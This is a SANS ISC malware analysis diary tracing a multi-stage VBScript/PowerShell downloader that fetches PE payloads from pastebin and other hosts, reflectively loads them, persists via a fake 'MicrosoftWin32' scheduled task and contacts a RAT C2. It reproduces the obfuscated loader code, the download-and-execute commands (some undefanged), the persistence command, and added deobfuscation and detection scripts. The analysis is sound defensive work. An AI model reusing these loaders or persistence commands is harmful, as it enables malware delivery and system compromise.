SANS ISC: Malicious Script With Multiple Payloads SANS ISC InfoSec Forums

Malicious Script With Multiple Payloads

Pastebin.com remains a common way to host and download malicious data and/or scripts. A few days ago, I spotted this malicious script that got a very low score on VT: 3/57 (SHA256: 45e45d2932816b14665f65ee4fc1aa7473b29031da1612d3d909f867c618d80e)[1]. The obfuscation isn't very complex but remains quite effective. The script is just a downloader that fetches more content from pastebin.com as well as other sites.

A first payload is downloaded from pastebin.com:

Set As_wW = CreateObject("WScript.Shell")
Dim AXW
AXW1 = "pt.Shell"").Run(""powershell.exe -noexi"
AXW5 = "ng('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'e8GrYbHb'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)"
AXW2 = "t -command [Reflection.Assembly]::Load("
AXW4 = "-Object Net.WebClient).DownloadStri"
AXW0 = "cmd.exe /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject(""Wscri"
AXW3 = "[System.Convert]::FromBase64String((New"
AXW = AXW0 + AXW1 + AXW2 + AXW3 + AXW4 + AXW5
As_wW.Run AXW, vbHide

The decoded command is:

cmd.exe /c ping 127.0.0.1 -n 10 > nul & \
mshta.exe vbscript:CreateObject("Wscript.Shell").Run(""powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('hxxps://pastebin[.]com/raw/e8GrYbHb'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)

Let's have a look at the pastie:

isc> curl -s hxxps://pastebin[.]com/raw/e8GrYbHb | head -c 100
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgB

You immediately recognise a PE file: "TVqQ" is the base64 encoding of the "MZ" header.

isc> curl -s hxxps://pastebin[.]com/raw/e8GrYbHb | base64 -d | sha256sum
8d54da80492eefcb1b688be56a18d2ea353aaa2d02b09256d5f3c9803104a1bf -

The file has a score of 17/72 on VT[2].

Then, a second payload is downloaded:

Set shell = CreateObject("WScript.Shell")
shell.Run("Powershell.exe -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.m9c.net/uploads/15615146751.jpg'').replace(''*'',''x0'')'));[<##>AppDomain<##>]::<##>('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64).'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))($null,$null)"),0
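Both stages above hide the real command line behind cheap string tricks: the first builds it from VBScript fragments assigned out of order and concatenated at the end, the second splits PowerShell literals with `+` and rebuilds identifiers with `.replace()` and empty `<##>` comments. The following script is an added example (my own code, not part of the diary or the malware) that undoes exactly those tricks statically, without executing anything: it resolves VBScript string assignments and concatenations, folds PowerShell single-quoted concatenations and `.replace()` chains, strips `<##>`, and collapses `::('Name')` / `.('Name')` dynamic member access. The two samples are copies of the snippets shown above (the second URL is written in defanged form).

```python
import re

# --- Constructed samples: copies of the two snippets shown in the diary ---
SAMPLE_VBS = r"""Set As_wW = CreateObject("WScript.Shell")
Dim AXW
AXW1 = "pt.Shell"").Run(""powershell.exe -noexi"
AXW5 = "ng('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'e8GrYbHb'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)"
AXW2 = "t -command [Reflection.Assembly]::Load("
AXW4 = "-Object Net.WebClient).DownloadStri"
AXW0 = "cmd.exe /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject(""Wscri"
AXW3 = "[System.Convert]::FromBase64String((New"
AXW = AXW0 + AXW1 + AXW2 + AXW3 + AXW4 + AXW5
As_wW.Run AXW, vbHide
"""

SAMPLE_PS = r"""Powershell.exe -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''hxxp://www.m9c[.]net/uploads/15615146751.jpg'').replace(''*'',''x0'')'));[<##>AppDomain<##>]::<##>('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64).'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))($null,$null)"""

# --- VBScript: string literals ("" is an escaped quote) and var = a + b + c lines ---
VB_LIT_RE = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"]|"")*)"\s*$')
VB_CAT_RE = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*\+\s*\w+)+)\s*$')
VB_RUN_RE = re.compile(r'\.Run\s+(\w+)\s*,', re.IGNORECASE)


def reassemble_vbscript(src):
    """Resolve every string variable in the script; return (values, commands passed to .Run)."""
    literals, concats = {}, {}
    for line in src.splitlines():
        m = VB_LIT_RE.match(line)
        if m:
            literals[m.group(1)] = m.group(2).replace('""', '"')
            continue
        m = VB_CAT_RE.match(line)
        if m:
            concats[m.group(1)] = re.split(r'\s*\+\s*', m.group(2).strip())

    def resolve(name, depth=0):
        if name in literals:
            return literals[name]
        if name in concats and depth < 50:          # depth guard against cyclic definitions
            return ''.join(resolve(p, depth + 1) for p in concats[name])
        return '<' + name + '?>'                    # unresolved reference, left visible

    values = {n: resolve(n) for n in list(literals) + list(concats)}
    runs = [values.get(n, n) for n in VB_RUN_RE.findall(src)]
    return values, runs


# --- PowerShell: single-quoted literals ('' is an escaped quote), concatenation, .replace() ---
SQ = r"'((?:[^']|'')*)'"
CONCAT_RE = re.compile(SQ + r"(?:\s*\+\s*" + SQ + r")+")
REPLACE_RE = re.compile(SQ + r"\.replace\(\s*" + SQ + r"\s*,\s*" + SQ + r"\s*\)", re.IGNORECASE)
MEMBER_RE = re.compile(r"(::|\.)\('([A-Za-z_]\w*)'\)")   # ::('Load')  ->  ::Load
QMEMBER_RE = re.compile(r"\.'([A-Za-z_]\w*)'")            # .'EntryPoint' -> .EntryPoint


def _fold_concat(m):
    # every literal inside the match, still in escaped form, glued into one literal
    return "'" + "".join(re.findall(SQ, m.group(0))) + "'"


def _fold_replace(m):
    lit, old, new = (g.replace("''", "'") for g in m.groups())
    return "'" + lit.replace(old, new).replace("'", "''") + "'"


def fold_powershell(cmd):
    """Statically simplify the string-building tricks; nothing is evaluated."""
    cmd = cmd.replace('<##>', '')
    prev = None
    while prev != cmd:                              # .replace() chains need several passes
        prev = cmd
        cmd = CONCAT_RE.sub(_fold_concat, cmd)
        cmd = REPLACE_RE.sub(_fold_replace, cmd)
    cmd = MEMBER_RE.sub(r"\1\2", cmd)
    return QMEMBER_RE.sub(r".\1", cmd)


def decode_samples():
    """Return the readable form of both staged commands."""
    _, runs = reassemble_vbscript(SAMPLE_VBS)
    return [fold_powershell(r) for r in runs] + [fold_powershell(SAMPLE_PS)]


if __name__ == "__main__":
    for c in decode_samples():
        print(c, end="\n\n")
```

The second sample folds to `[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invoke($null,$null)`, which makes the in-memory assembly load obvious without ever running `iex`. The nested `iex('...')` literal is deliberately left as a literal, since its `.replace(''*'',''x0'')` only makes sense when the downloaded text is evaluated.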

Let's have a look at this payload:

isc> curl -s hxxp://www.m9c[.]net/uploads/15615146751.jpg | head -c 100
    0x4D, 0x5A, 0x90, 0*0, 0*3, 0*0, 0*0, 0*0, 0*4, 0*0, 0*0, 0*0,
    0xFF, 0xFF, 0*0, 0*0, 0xB8, 0*0, 0

Again, a PE file (0x4D, 0x5A == "MZ"). The loader's own `.replace('*','x0')` turns `0*0` into `0x00`, so it can be easily decoded with a tool like CyberChef via a bunch of search/replace operations followed by a conversion from hex. The file is unknown on VT (SHA256: 86e29714187bdfe606ca791e83f48263e590598b9f466ff5bf6a7ce99a4e54d3).
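The same search/replace and hex conversion, as an added example in Python rather than CyberChef (my own code, not the diary's). It applies the `*` to `x0` substitution the loader performs, parses the `0x..` list into bytes, checks for the `MZ` stub and, when enough of the file is present, follows `e_lfanew` to the `PE\0\0` signature. The sample is a constructed copy of the first bytes shown above, so the PE header check reports `None` (truncated) for it.

```python
import hashlib
import re

# Constructed sample: the first bytes of the payload as listed in the diary.
SAMPLE_BYTELIST = """    0x4D, 0x5A, 0x90, 0*0, 0*3, 0*0, 0*0, 0*0, 0*4, 0*0, 0*0, 0*0,
    0xFF, 0xFF, 0*0, 0*0, 0xB8, 0*0,"""

BYTE_RE = re.compile(r'0x([0-9A-Fa-f]{1,2})')


def decode_bytelist(text, star='*', fill='x0'):
    """Undo the '*' -> 'x0' substitution and turn the 0x.. list into raw bytes."""
    text = text.replace(star, fill)
    return bytes(int(h, 16) for h in BYTE_RE.findall(text))


def inspect_pe(blob):
    """Cheap sanity check on a decoded blob: MZ stub, PE signature, size and hash."""
    has_pe_sig = None                       # None = file too short to tell
    if len(blob) >= 0x40:
        e_lfanew = int.from_bytes(blob[0x3C:0x40], 'little')
        has_pe_sig = blob[e_lfanew:e_lfanew + 4] == b'PE\x00\x00'
    return {
        'is_mz': blob[:2] == b'MZ',
        'has_pe_signature': has_pe_sig,
        'size': len(blob),
        'sha256': hashlib.sha256(blob).hexdigest(),
    }


if __name__ == "__main__":
    print(inspect_pe(decode_bytelist(SAMPLE_BYTELIST)))
```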

The third payload is again grabbed from pastebin:

isc> curl -s hxxps://pastebin[.]com/raw/2HpiMFUJ
<script language="VBScript">
'============Checking the system architecture=========================================
Set oShell = CreateObject ("Wscript.Shell")
Dim strArgs
strArgs = "powershell -noexit $Script = Invoke-WebRequest 'hxxps://pastebin[.]com/raw/9NQF7jy5';$ScriptBlock = [Scriptblock]::Create($Script.Content);Invoke-Command -ScriptBlock $ScriptBlock -ArgumentList ($args + @('someargument'));" oShell.Run strArgs, 0, false
self.close
</script>

And the next payload is:

isc> curl -s hxxps://pastebin[.]com/raw/9NQF7jy5
$code = @"
using System.Net;
using System.Reflection;
using System;
using System.Threading;
namespace CDTPitbull
{
    public class Cat
    {
        public void Run()
        {
            using (WebClient wc = new WebClient())
            {
               // new Thread(() =>
              //  {
                    try
                    {
                        Assembly asm = AppDomain.CurrentDomain.Load(Convert.FromBase64String(wc.DownloadString("hxxps://pastebin[.]com/raw/3qSWYxTb")));
                        MethodInfo Metinf = asm.EntryPoint;
                        object InjObj = asm.CreateInstance(Metinf.Name);
                        object[] parameters = new object[1];  // C#
                        if (Metinf.GetParameters().Length == 0)
                        {
                            parameters = null; // VB.NET
                        }
                        Metinf.Invoke(InjObj, parameters);
                    }
                    catch { return; }
              //  })
              //  { IsBackground = false }.Start();
            }
        }
    }
}
"@

Add-Type -TypeDefinition $code;
$instance = New-Object CDTPitbull.Cat;
$instance.Run();

And the last one is again a PE file:

isc> curl -s hxxps://pastebin[.]com/raw/3qSWYxTb | head -c 100
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgB
isc> curl -s hxxps://pastebin[.]com/raw/3qSWYxTb | base64 -d | sha256sum
55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f  -

This payload has a score of 24/70 on VT[3] (SHA256: 55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f).

Persistence is achieved by creating a scheduled task:

cmd.exe /c ping 127.0.0.1 -n 30 > nul & schtasks /create /sc MINUTE /mo 200 /tn "MicrosoftWin32" /tr "mshta vbscript:CreateObject(\"Wscript.Shell").Run(\"mshta.exe hxxps://pastebin[.]com/raw/2HpiMFUJ\",0,true)(window.close)" /F
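A task like this one is easy to spot in an export of the task scheduler because the action is mshta running an inline `vbscript:` URL that itself launches mshta against a remote paste. The following detection script is an added example (my own code, not part of the diary) that scans rows in the shape of `schtasks /query /fo CSV /v` output, assuming that export's `TaskName` and `Task To Run` columns, and flags the patterns visible in the command above: mshta with a script-protocol argument, mshta fetching a remote URL, a `WScript.Shell` `.Run(` chain, a paste site as payload host, and a task name that imitates Microsoft without living under the `\Microsoft\` folder (a heuristic). The CSV sample is constructed; its first row reproduces the task created by the malware, the other two are benign fillers.

```python
import csv
import io
import re

# Constructed sample in the shape of `schtasks /query /fo CSV /v` output (columns trimmed).
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run"
"WS01","\MicrosoftWin32","mshta vbscript:CreateObject(""Wscript.Shell"").Run(""mshta.exe hxxps://pastebin[.]com/raw/2HpiMFUJ"",0,true)(window.close)"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$"
"WS01","\Backup","C:\Tools\backup.bat nightly"
'''

# Each rule: (label, regex applied to the task action).  hxxp is matched as well
# so that defanged exports from a ticketing system still trigger.
ACTION_RULES = [
    ('mshta with inline script protocol',
     re.compile(r'\bmshta(?:\.exe)?\s+"?(?:vbscript|javascript):', re.IGNORECASE)),
    ('mshta fetching a remote script',
     re.compile(r'\bmshta(?:\.exe)?\s+"?(?:hxxp|http)s?://', re.IGNORECASE)),
    ('WScript.Shell .Run chain inside a task action',
     re.compile(r'WScript\.Shell.{0,40}\.Run\(', re.IGNORECASE)),
    ('paste site used as payload host',
     re.compile(r'pastebin\[?\.\]?com', re.IGNORECASE)),
]

# Heuristic: "Microsoft..." names outside the real \Microsoft\ folder are worth a look.
FAKE_MS_NAME_RE = re.compile(r'(?:^|\\)Microsoft\w+$')


def parse_schtasks_csv(text):
    """Yield (task_name, action) pairs from a schtasks CSV export."""
    reader = csv.DictReader(io.StringIO(text))
    return [(row['TaskName'], row['Task To Run']) for row in reader]


def scan_tasks(rows):
    """Return [(task_name, [matched rule labels])] for every suspicious task."""
    findings = []
    for name, action in rows:
        hits = [label for label, rx in ACTION_RULES if rx.search(action or '')]
        if FAKE_MS_NAME_RE.search(name) and not name.startswith('\\Microsoft\\'):
            hits.append('task name imitates Microsoft outside \\Microsoft\\')
        if hits:
            findings.append((name, hits))
    return findings


if __name__ == "__main__":
    for name, hits in scan_tasks(parse_schtasks_csv(SAMPLE_CSV)):
        print(name)
        for h in hits:
            print('  -', h)
```

On a live host the same rows come from `schtasks /query /fo CSV /v`; the interval of 200 minutes in the original `/sc MINUTE /mo 200` is another useful field to pivot on once a hit is found.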

Finally, any running Excel or Word instances are killed:

Set X7W832DSA = CreateObject("WScript.Shell")
Dim ASSd712ji8asd
ASSd712ji8asd = "cmd.exe /c cd ""%ProgramFiles%""  & taskkill /f /im EXCEL.EXE & taskkill /f /im WINWORD.EXE & exit"
X7W832DSA.Run ASSd712ji8asd, vbHide

I don't know the purpose of this...

It's a RAT trying to connect to the following C2 server: bylgay[.]hopto[.]org (152[.]245[.]159[.]90)

[1] https://www.virustotal.com/gui/file/45e45d2932816b14665f65ee4fc1aa7473b29031da1612d3d909f867c618d80e/detection
[2] https://www.virustotal.com/gui/file/8d54da80492eefcb1b688be56a18d2ea353aaa2d02b09256d5f3c9803104a1bf/detection
[3] https://www.virustotal.com/gui/file/55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant